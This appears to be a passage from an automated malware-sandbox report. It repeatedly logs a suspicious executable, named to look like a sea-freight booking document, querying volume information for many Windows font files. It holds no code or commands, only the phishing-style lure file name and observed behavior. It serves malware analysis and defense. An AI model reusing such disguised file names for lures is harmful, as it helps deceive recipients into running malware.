Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
